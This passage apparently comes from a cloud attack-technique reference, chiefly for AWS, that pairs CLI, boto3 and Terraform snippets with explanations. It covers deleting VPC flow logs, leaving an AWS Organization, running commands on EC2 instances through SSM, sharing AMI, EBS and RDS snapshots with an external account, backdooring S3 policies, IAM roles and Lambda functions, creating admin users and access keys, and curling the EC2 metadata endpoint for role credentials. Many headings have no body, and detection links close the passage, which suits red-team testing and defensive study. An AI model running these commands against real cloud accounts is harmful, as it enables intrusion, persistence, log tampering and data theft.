  • terraform apply -auto-approve -var 'enable_organization=false': Applies the Terraform configuration and provisions or updates resources. The -auto-approve flag automatically approves the execution without requiring user confirmation. The -var 'enable_organization=false' flag sets the value of the enable_organization variable to false, indicating that the AWS Organization should be disabled.
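Both directions of this technique can be sketched in the CLI; the account ID is a placeholder, and the calls are commented because they require credentials (and, for the second, management-account privileges):

```shell
# From inside the member account -- no account ID is needed,
# because the call always acts on the calling account:
# aws organizations leave-organization

# From the organization's management account, removing a member:
ACCOUNT_ID="111111111111"   # placeholder member account ID
CMD="aws organizations remove-account-from-organization --account-id $ACCOUNT_ID"
# eval "$CMD"

echo "$CMD"
```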

Remove VPC Flow Logs

   
  • aws ec2 delete-flow-logs: Executes the AWS CLI command to delete VPC flow logs.
  • --flow-log-ids <flow_log_ids>: Specifies the IDs of the flow logs to be deleted. <flow_log_ids> should be replaced with the actual IDs of the flow logs you want to delete.
  • --region <region>: Specifies the AWS region where the flow logs are located. <region> should be replaced with the appropriate region identifier, such as us-east-1 or eu-west-2.
   
  • import boto3: Imports the Boto3 library, which is the official AWS SDK for Python.
  • ec2 = boto3.client('ec2'): Creates an EC2 client object using Boto3.
  • ec2.delete_flow_logs(FlowLogIds=['<flow_log_id_1>', '<flow_log_id_2>']): Calls the delete_flow_logs method of the EC2 client to delete VPC flow logs. Replace <flow_log_id_1> and <flow_log_id_2> with the actual IDs of the flow logs you want to delete.
   
  • terraform init: Initializes the Terraform working directory by downloading the necessary provider plugins and configuring the backend.
  • terraform import aws_flow_log.this <flow_log_id>: Imports an existing VPC flow log into the Terraform state. Replace <flow_log_id> with the actual ID of the flow log you want to manage with Terraform. This command associates the flow log with the Terraform resource named aws_flow_log.this.
  • terraform destroy -auto-approve: Destroys the Terraform-managed resources specified in the configuration files. The -auto-approve flag is used to automatically approve the destruction without requiring user confirmation.
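A CLI sketch of the enumerate-then-delete flow described above; the region and flow log ID are placeholders, with the live calls commented out:

```shell
REGION="us-east-1"   # placeholder

# First enumerate the flow log IDs (requires credentials):
# aws ec2 describe-flow-logs --query 'FlowLogs[].FlowLogId' --output text --region "$REGION"

FLOW_LOG_IDS="fl-0123456789abcdef0"   # placeholder ID(s), space-separated
CMD="aws ec2 delete-flow-logs --flow-log-ids $FLOW_LOG_IDS --region $REGION"
# eval "$CMD"   # removes the VPC flow logs

echo "$CMD"
```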

Execute Discovery Commands on an EC2 Instance

   
  • aws ecs execute-command: This is the AWS CLI command for running a command inside a container of a running ECS task (ECS Exec must be enabled on the task).
  • --cluster <cluster> and --task <task_id>: Select the ECS cluster and the specific task in which to execute the command.
  • --interactive --command "<command>": Runs the given command in an interactive session inside the selected container.
   
  • aws ssm send-command: This is the AWS CLI command to interact with AWS Systems Manager and send a command.
  • --instance-ids <instance_id>: This option specifies the ID of the instance(s) to which the command should be sent. You can provide a single instance ID or a comma-separated list of multiple instance IDs.
  • --document-name "AWS-RunShellScript": This option specifies the name of the Systems Manager document to use. In this case, the command is using the built-in document “AWS-RunShellScript,” which allows running shell commands on the target instances.
  • --parameters '{"commands":["<command_1>", "<command_2>", "<command_3>"]}': This option specifies the parameters for the command. The commands parameter is an array of shell commands to be executed on the instances.
  • --region <region>: This option specifies the AWS region where the instances are located.
   
  • import boto3: This imports the Boto3 library, which provides an interface to interact with AWS services using Python.
  • ssm = boto3.client('ssm'): This creates an SSM (Systems Manager) client object using the boto3.client() method. The client object allows interaction with AWS Systems Manager.
  • ssm.send_command(...): This invokes the send_command() method of the SSM client to send a command to the specified instance(s).
    • InstanceIds=['<instance_id>']: This parameter specifies the ID of the instance(s) to which the command should be sent. You can provide a single instance ID or a list of multiple instance IDs.
    • DocumentName='AWS-RunShellScript': This parameter specifies the name of the Systems Manager document to use. In this case, the command is using the built-in document “AWS-RunShellScript,” which allows running shell commands on the target instances.
    • Parameters={'commands':['<command_1>', '<command_2>', '<command_3>']}: This parameter specifies the parameters for the command. The commands parameter is a list of shell commands to be executed on the instances.
   
  1. terraform init: This command initializes the Terraform working directory by downloading and configuring the necessary providers and modules.
  2. terraform import aws_instance.this <instance_id>: This command imports an existing EC2 instance into the Terraform state. It associates the specified <instance_id> with the aws_instance.this resource in the Terraform configuration.
  3. terraform apply -auto-approve -var 'command="<command_1>; <command_2>; <command_3>"': This command applies the Terraform configuration and provisions or modifies the infrastructure as necessary. The -auto-approve flag skips the interactive approval prompt. The -var flag sets a variable named command to the provided value, which represents a series of shell commands <command_1>; <command_2>; <command_3> to be executed on the EC2 instance.
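The SSM variant above can be sketched as follows. The instance ID, region, and the example discovery commands are all placeholders; the send-command call is commented because it needs credentials and a running SSM agent on the target:

```shell
INSTANCE_ID="i-0123456789abcdef0"   # placeholder
REGION="us-east-1"                  # placeholder

# Typical discovery commands to run on the instance.
PARAMS='{"commands": ["whoami", "uname -a", "cat /etc/os-release"]}'

# Live call, shown for reference (requires credentials):
# aws ssm send-command \
#   --instance-ids "$INSTANCE_ID" \
#   --document-name "AWS-RunShellScript" \
#   --parameters "$PARAMS" \
#   --region "$REGION"

echo "$PARAMS"
```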

Download EC2 Instance User Data

   
  1. aws ec2 describe-instance-attribute --instance-id <instance_id> --attribute userData --query "UserData.Value" --output text --region <region>: This AWS CLI command describes the specified EC2 instance attribute, which in this case is the user data. The <instance_id> parameter is the ID of the EC2 instance for which you want to retrieve the user data, and the <region> parameter specifies the AWS region where the instance is located. The --query option extracts the value of the UserData.Value attribute, and the --output option sets the output format to text.
  2. base64 --decode: This command decodes the base64-encoded user data retrieved from the previous AWS CLI command. The --decode option instructs the base64 command to perform the decoding operation.
   
  1. import boto3: This imports the Boto3 library, which is the official AWS SDK for Python.
  2. ec2 = boto3.client('ec2'): This creates an EC2 client object using Boto3.
  3. response = ec2.describe_instance_attribute(InstanceId='<instance_id>', Attribute='userData'): This calls the describe_instance_attribute method of the EC2 client to retrieve the specified attribute of the EC2 instance. The <instance_id> parameter is the ID of the EC2 instance, and the Attribute parameter is set to 'userData' to retrieve the user data.
  4. print(base64.b64decode(response['UserData']['Value']).decode()): The value of the 'UserData' key in the response is base64-encoded. Because str.decode('base64') no longer exists in Python 3, the standard base64 module (import base64) is used to decode the user data before printing it to the console.
   
  1. terraform init: Initializes the Terraform working directory, downloading any necessary providers and setting up the environment.
  2. terraform import aws_instance.this <instance_id>: Imports an existing EC2 instance into the Terraform state. This associates the EC2 instance in the AWS account with the corresponding Terraform resource.
  3. terraform apply -auto-approve -var 'instance_id=<instance_id>': Applies the Terraform configuration and provisions any required resources. The -auto-approve flag skips the interactive confirmation prompt, and the -var flag sets the value of the instance_id variable used within the Terraform configuration.
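Only the AWS call itself needs credentials; the decoding step can be exercised locally with sample data. The instance ID and region in the commented pipeline are placeholders:

```shell
# The live pipeline, for reference (requires credentials):
# aws ec2 describe-instance-attribute --instance-id i-0123456789abcdef0 \
#   --attribute userData --query 'UserData.Value' --output text \
#   --region us-east-1 | base64 --decode

# The base64 round trip demonstrated with sample user data:
SAMPLE=$(printf '#!/bin/bash\necho hello' | base64)
DECODED=$(printf '%s' "$SAMPLE" | base64 --decode)
echo "$DECODED"
```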

Launch Unusual EC2 instances

   
  • --image-id <image_id>: Specifies the ID of the Amazon Machine Image (AMI) to use as the base for the EC2 instance. It defines the operating system and other software installed on the instance.
  • --instance-type p2.xlarge: Specifies the instance type, which determines the hardware specifications (such as CPU, memory, and storage capacity) of the EC2 instance. In this case, p2.xlarge is the instance type.
  • --count 1: Specifies the number of instances to launch. In this case, it launches a single instance.
  • --region <region>: Specifies the AWS region in which to launch the instance. The region defines the geographical location where the EC2 instance will be provisioned.
   

The -var 'instance_type=p2.xlarge' option is used to set a variable named instance_type to the value p2.xlarge. This variable can be referenced in the Terraform configuration files to dynamically configure resources.

   
  • import boto3: Imports the Boto3 library, which provides an interface to interact with AWS services using Python.
  • ec2 = boto3.resource('ec2'): Creates an EC2 resource object using Boto3. This resource object allows us to interact with EC2 instances.
  • instance = ec2.create_instances(ImageId='<image_id>', InstanceType='p2.xlarge', MinCount=1, MaxCount=1): Creates a new EC2 instance using the specified image ID and instance type. The MinCount and MaxCount parameters are both set to 1, indicating that a single instance should be launched.
  • print(instance[0].id): Prints the ID of the created EC2 instance. The instance variable is a list, and instance[0] refers to the first (and in this case, the only) instance in the list. The .id attribute retrieves the ID of the instance.
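The CLI form of this technique, sketched with a placeholder AMI ID and region; the launch itself is commented out since it requires credentials and incurs cost:

```shell
IMAGE_ID="ami-0123456789abcdef0"   # placeholder AMI ID
REGION="us-east-1"                 # placeholder

# p2.xlarge is a GPU instance type -- an unusual (and expensive) choice
# that is worth alerting on.
CMD="aws ec2 run-instances --image-id $IMAGE_ID --instance-type p2.xlarge --count 1 --region $REGION"
# eval "$CMD"   # requires credentials

echo "$CMD"
```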

Execute Commands on EC2 Instance via User Data


Open Ingress Port 22 on a Security Group

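A minimal CLI sketch of this technique; the security group ID is a placeholder and the live call is commented out:

```shell
SG_ID="sg-0123456789abcdef0"   # placeholder security group ID

# Opens SSH (TCP/22) to the whole internet on the given security group.
CMD="aws ec2 authorize-security-group-ingress --group-id $SG_ID --protocol tcp --port 22 --cidr 0.0.0.0/0"
# eval "$CMD"   # requires credentials

echo "$CMD"
```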

Exfiltrate an AMI by Sharing It

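A minimal CLI sketch; the AMI ID and external account ID are placeholders, and the call is commented out. The launch-permission argument would need quoting when run directly, to keep the shell from expanding the brackets:

```shell
IMAGE_ID="ami-0123456789abcdef0"   # placeholder AMI ID
EXTERNAL_ACCOUNT="111111111111"    # placeholder attacker-controlled account ID

# Grants launch permission on the AMI to an external AWS account.
CMD="aws ec2 modify-image-attribute --image-id $IMAGE_ID --launch-permission Add=[{UserId=$EXTERNAL_ACCOUNT}]"
# eval "$CMD"   # requires credentials

echo "$CMD"
```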

Exfiltrate EBS Snapshot by Sharing It

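A minimal CLI sketch; snapshot and account IDs are placeholders, and the live call is commented out:

```shell
SNAPSHOT_ID="snap-0123456789abcdef0"   # placeholder EBS snapshot ID
EXTERNAL_ACCOUNT="111111111111"        # placeholder attacker-controlled account ID

# Grants createVolumePermission on the snapshot to an external account,
# which can then copy it or create volumes from it.
CMD="aws ec2 modify-snapshot-attribute --snapshot-id $SNAPSHOT_ID --attribute createVolumePermission --operation add --user-ids $EXTERNAL_ACCOUNT"
# eval "$CMD"   # requires credentials

echo "$CMD"
```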

Exfiltrate RDS Snapshot by Sharing

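A minimal CLI sketch; identifiers are placeholders, live call commented out:

```shell
SNAPSHOT_ID="my-db-snapshot"      # placeholder RDS snapshot identifier
EXTERNAL_ACCOUNT="111111111111"   # placeholder attacker-controlled account ID

# "restore" is the attribute controlling which accounts may restore the snapshot.
CMD="aws rds modify-db-snapshot-attribute --db-snapshot-identifier $SNAPSHOT_ID --attribute-name restore --values-to-add $EXTERNAL_ACCOUNT"
# eval "$CMD"   # requires credentials

echo "$CMD"
```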

Backdoor an S3 Bucket via its Bucket Policy

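A minimal sketch of a backdoored bucket policy; the bucket name and external account ID are placeholders, and the put-bucket-policy call is commented out:

```shell
BUCKET="victim-bucket"            # placeholder bucket name
EXTERNAL_ACCOUNT="111111111111"   # placeholder attacker-controlled account ID

# Bucket policy granting read access to the external account.
POLICY=$(cat <<EOF
{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Allow",
    "Principal": {"AWS": "arn:aws:iam::$EXTERNAL_ACCOUNT:root"},
    "Action": ["s3:GetObject", "s3:ListBucket"],
    "Resource": ["arn:aws:s3:::$BUCKET", "arn:aws:s3:::$BUCKET/*"]
  }]
}
EOF
)

# aws s3api put-bucket-policy --bucket "$BUCKET" --policy "$POLICY"   # requires credentials
echo "$POLICY"
```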

Console Login without MFA


Backdoor an IAM Role

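One common form of this technique is editing the role's trust policy so an external account may assume it. A minimal sketch; role name and account ID are placeholders, live call commented out:

```shell
ROLE_NAME="target-role"           # placeholder role name
EXTERNAL_ACCOUNT="111111111111"   # placeholder attacker-controlled account ID

# Trust policy allowing the external account to assume the role.
TRUST_POLICY=$(cat <<EOF
{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Allow",
    "Principal": {"AWS": "arn:aws:iam::$EXTERNAL_ACCOUNT:root"},
    "Action": "sts:AssumeRole"
  }]
}
EOF
)

# aws iam update-assume-role-policy --role-name "$ROLE_NAME" --policy-document "$TRUST_POLICY"
echo "$TRUST_POLICY"
```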

Create an Access Key on an IAM User

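A minimal CLI sketch; the user name is a placeholder, live call commented out:

```shell
USER_NAME="target-user"   # placeholder IAM user name

# Returns a new AccessKeyId/SecretAccessKey pair for the user
# (IAM allows at most two active keys per user).
CMD="aws iam create-access-key --user-name $USER_NAME"
# eval "$CMD"   # requires credentials

echo "$CMD"
```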

Create an administrative IAM User

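A minimal two-step CLI sketch; the user name is a placeholder, live calls commented out:

```shell
USER_NAME="backdoor-admin"   # placeholder IAM user name

# Create the user, then attach the AWS-managed AdministratorAccess policy.
CMD1="aws iam create-user --user-name $USER_NAME"
CMD2="aws iam attach-user-policy --user-name $USER_NAME --policy-arn arn:aws:iam::aws:policy/AdministratorAccess"
# eval "$CMD1" && eval "$CMD2"   # requires credentials

echo "$CMD1"
echo "$CMD2"
```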

Create a Login Profile on an IAM User

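A minimal CLI sketch; user name and password are placeholders, live call commented out:

```shell
USER_NAME="target-user"      # placeholder IAM user name
PASSWORD='Str0ngP@ssw0rd!'   # placeholder password

# Gives an existing IAM user a console password (i.e. console login capability).
CMD="aws iam create-login-profile --user-name $USER_NAME --password $PASSWORD --no-password-reset-required"
# eval "$CMD"   # requires credentials

echo "$CMD"
```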

Backdoor Lambda Function Through Resource-Based Policy

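A minimal CLI sketch; function name, statement ID, and account ID are placeholders, live call commented out:

```shell
FUNCTION_NAME="target-function"   # placeholder Lambda function name
EXTERNAL_ACCOUNT="111111111111"   # placeholder attacker-controlled account ID

# Adds a resource-based policy statement letting the external account invoke the function.
CMD="aws lambda add-permission --function-name $FUNCTION_NAME --statement-id backdoor --action lambda:InvokeFunction --principal $EXTERNAL_ACCOUNT"
# eval "$CMD"   # requires credentials

echo "$CMD"
```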

Overwrite Lambda Function Code

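A minimal CLI sketch; the function name and zip path are placeholders, live call commented out:

```shell
FUNCTION_NAME="target-function"   # placeholder Lambda function name

# Replaces the function's deployment package with attacker-supplied code;
# code.zip is a placeholder path to a zip containing the new handler.
CMD="aws lambda update-function-code --function-name $FUNCTION_NAME --zip-file fileb://code.zip"
# eval "$CMD"   # requires credentials

echo "$CMD"
```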

Create an IAM Roles Anywhere trust anchor


Execute Command on Virtual Machine using Custom Script Extension


Execute Commands on Virtual Machine using Run Command


Export Disk Through SAS URL


Create an Admin GCP Service Account


Create a GCP Service Account Key


Impersonate GCP Service Accounts


Privilege escalation through KMS key policy modifications


Enumeration of EKS clusters and associated resources


Privilege escalation through RDS database credentials


Enumeration of open S3 buckets and their contents


Privilege escalation through EC2 instance takeover


Enumeration of AWS Glue Data Catalog databases


Privilege escalation through assumed role sessions


Enumeration of ECS clusters and services


Privilege escalation through hijacking AWS SDK sessions


Enumeration of ECR repositories with public access


Privilege escalation through hijacking AWS CLI sessions


Enumeration of Elastic Beanstalk environments with public access


Privilege escalation by attaching an EC2 instance profile


Stealing EC2 instance metadata


Enumeration of EC2 instances with public IP addresses


Enumeration of AWS Systems Manager parameters


Privilege escalation through EC2 metadata

   
  • curl: The command-line tool used to perform the HTTP request.
  • http://169.254.169.254/latest/meta-data/iam/security-credentials/<role_name>: The URL endpoint of the metadata service to retrieve the security credentials for the specified IAM role. Replace <role_name> with the name of the IAM role.
   

Pacu's pacu.py script can be run with the escalate_iam_roles method, which is specifically designed to escalate privileges associated with IAM roles. The --profile option specifies the AWS profile to use for authentication, and the --regions option specifies the AWS regions to target. The --instances option is used to specify the target EC2 instance ID(s) on which the IAM roles will be escalated.
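The metadata endpoint described in the bullets above can be sketched as follows. The role name is a placeholder, and the curl calls are commented out because the endpoint only resolves from inside an EC2 instance; the IMDSv2 token flow is included since many instances now require it:

```shell
ROLE_NAME="my-instance-role"   # placeholder; resolvable only from inside an EC2 instance
URL="http://169.254.169.254/latest/meta-data/iam/security-credentials/$ROLE_NAME"

# IMDSv1, exactly as in the bullets above:
# curl "$URL"

# IMDSv2 requires fetching a session token first:
# TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" \
#   -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
# curl -s -H "X-aws-ec2-metadata-token: $TOKEN" "$URL"

echo "$URL"
```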

AWS cross-account enumeration

   
  • python3 cloudmapper.py: Executes the CloudMapper tool using the Python 3 interpreter.
  • enum --account <account_id> --regions <aws_regions>: Specifies the enumeration mode and provides additional parameters to configure the account and regions to scan.
    • --account <account_id>: Specifies the AWS account ID to scan. Replace <account_id> with the actual AWS account ID you want to enumerate.
    • --regions <aws_regions>: Specifies the AWS regions to scan. Replace <aws_regions> with a comma-separated list of AWS regions (e.g., us-east-1,us-west-2) you want to include in the enumeration.
   
  • python3 pacu.py: Executes the PACU tool using the Python 3 interpreter.
  • --method enum_organizations: Specifies the specific method to run, in this case, enum_organizations, which is responsible for enumerating AWS Organizations.
  • --profile <aws_profile>: Specifies the AWS profile to use for authentication. Replace <aws_profile> with the name of the AWS profile configured on your system.
  • --regions <aws_regions>: Specifies the AWS regions to target for enumeration. Replace <aws_regions> with a comma-separated list of AWS regions (e.g., us-east-1,us-west-2) you want to include in the enumeration.
   
  • aws sts assume-role: Initiates the assume-role operation using the AWS Security Token Service (STS).
  • --role-arn arn:aws:iam::<target_account_id>:role/<role_name>: Specifies the ARN (Amazon Resource Name) of the IAM role you want to assume. Replace <target_account_id> with the ID of the AWS account that owns the role, and <role_name> with the name of the IAM role.
  • --role-session-name <session_name>: Specifies the name for the session associated with the assumed role. Replace <session_name> with a descriptive name for the session.
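The assume-role call above can be sketched end to end; the target account and role name are placeholders (OrganizationAccountAccessRole is a common default cross-account role), and the live call is commented out:

```shell
TARGET_ACCOUNT="222222222222"               # placeholder target account ID
ROLE_NAME="OrganizationAccountAccessRole"   # placeholder; a common default cross-account role
SESSION_NAME="enum-session"                 # placeholder session name

CMD="aws sts assume-role --role-arn arn:aws:iam::$TARGET_ACCOUNT:role/$ROLE_NAME --role-session-name $SESSION_NAME"
# eval "$CMD"   # returns temporary AccessKeyId, SecretAccessKey and SessionToken

echo "$CMD"
```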

Secure Configuration

https://github.com/FalconForceTeam/FalconFriday

Detection

https://github.com/FalconForceTeam/FalconFriday

CloudTrail Event

https://gist.github.com/invictus-ir/06d45ad738e3cc90bc4afa80f6a72c0a

Labs
